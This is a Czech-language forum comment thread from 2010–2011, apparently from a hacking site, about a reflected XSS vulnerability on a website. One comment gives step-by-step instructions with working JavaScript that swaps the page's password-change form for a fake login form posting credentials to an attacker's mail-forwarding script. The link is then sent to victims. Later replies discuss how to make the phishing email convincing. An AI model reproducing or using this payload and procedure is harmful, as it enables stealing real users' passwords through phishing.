|
| a není to spíš XSM? (odpovědět) | _ano_nymous | 195.39.54.125/unknown | 18.11.2010 9:23 |
|
|
|
| [link] ? ne, myslim že to má správně, xss... (odpovědět) | Fu(c)ker | 217.117.208.* | 22.11.2010 20:34 |
|
|
|
| záleží na prohlížeči a jeho verzi..některý to zobrazí jako XSM jiný jako XSS :)
(odpovědět) | _ano_nymous | 195.39.54.125/unknown | 23.11.2010 6:45 |
|
|
|
| k cemu je to dobry? (odpovědět) | spirit | 83.208.22.* | 7.2.2011 2:46 |
|
|
|
| Protože jsem dostal ohledně možného zneužití této zranitelnosti dotaz e-mailem, uvádím zde jednu z možných variant zneužití:
1) vytořit soubor csfd.js s tímto obsahem:
window.onload=function (){
document.getElementsByTagName(String.fromCh arCode(116,97,98,108,101))[1].innerHTML=''+
'<tr>'+
'<td align="center">'+
'<span class="style4" style="font-size:22px;color:#B50000;font-fa mily:Tahoma">PŘIHLÁŠENÍ</span>< br>'+
'<br>'+
'<table border="0" align="center" cellpadding="5" cellspacing="0">'+
'<tr>'+
' <td align="center">'+
' <form action="prihlaseni.php" method="post"> '+
' <table border="0" cellpadding="3" cellspacing="3" bgcolor="#CCCCCC" >'+
' <tr>'+
' <td align="right"> <b>Login:& lt;/b> </td>'+
' <td><input type="text" id="login" name="login" style="width: 150px" size="10"></td>'+
' </tr>'+
' <tr>'+
' <td align="right"> <b>Heslo:& lt;/b> </td>'+
' <td><input type="password" name="password" style="width: 150px" size="10"></td>'+
' </tr>'+
' </tr>'+
' </table>'+
' <br>'+
' <input type="submit" name="potvrdit" value="přihlásit se"/>'+
' </form>'+
' </td>'+
'</tr>'
}
2) Ve výše uvedeném kódu změnit atribut action, aby směřoval například na projekt get2mail zde na soomu.
3) Soubor uložit někam na svůj web
4) Vytvořit a odeslat oběti odkaz: [link]
5) pokud oběť na odkaz klikne a přihlásí se, přijde vám heslo do get2mail (odpovědět) | .cCuMiNn, | 78.80.204.* | 7.2.2011 10:06 |
|
|
|
| dik,nj ale kdo dnes klikne na odkaz v emailu,i kdyby to byl fake mejl..nehlede nato ze zas menit vygenerovane heslo na svoje,se obeti asi nebude chtit,takze se pokusi prihlasit pres svuj prohlizec (odpovědět) | spirit | 83.208.22.* | 7.2.2011 17:30 |
|
|
|
| spirit: tomuhle nerozumim: "nehlede nato ze zas menit vygenerovane heslo na svoje". Oběť by měla po kliknutí na odjaz videt prihlasovaci formular, pres ktery se jen pokusi prihlasit. Zkousel jsem to ve Firefoxu, nevim co to dela v jinych prohlizecich. BTW: Tomu kliknutí se bohužel u non-persistentního XSS nevyhneš.
----------
Teprve když vstáváte s hackingem a uléháte s myšlenkou na něj, máte šanci být hackerem. (odpovědět) | |
|
|
| jde oto ze se jedna o zmenu hesla.tzn zazadanim o nove heslo,prijde nove ktere si zas obet zas musi menit na svoje.tomu se kazdy bude chtit vyhnout tim ze se zkusi prihlasit jinym prohlizecem a zadanim url.no a tam zjisti ze je vse v poradku (odpovědět) | spirit | 83.208.22.* | 8.2.2011 1:39 |
|
|
|
| spirit: Nevím, jestli už jsi ten můj postup zkoušel, nebo ne a v jakém prohlížeči. Každopádně ten mnou zmíněný postup právě změní formulář pro změnu hesla za přihlašovací formulář, s tím, že heslo z něj odchází k tově. O žádné změnu hesla v něm nejde. (odpovědět) | .cCuMiNn, | 78.80.204.* | 8.2.2011 7:46 |
|
|
|
| Borec to asi nechápe..
Ono vpodstatě jiné využití XSS nemá. Nepozorný uživatel příjde o heslo, že ani nebude vědět jak. pokuď ho prohlížeč, nebo antivir neupozorní na možný XSS odkaz v emailu, tak přes fake mailer správně napsaný mail zaručí více než 50% šanci, že se ti jeho heslo vrátí. (odpovědět) | Grous | 195.113.207.* | 9.2.2011 12:17 |
|
|
|
| smekam :-) (odpovědět) | spirit | 83.208.22.* | 11.2.2011 4:55 |
|
|
|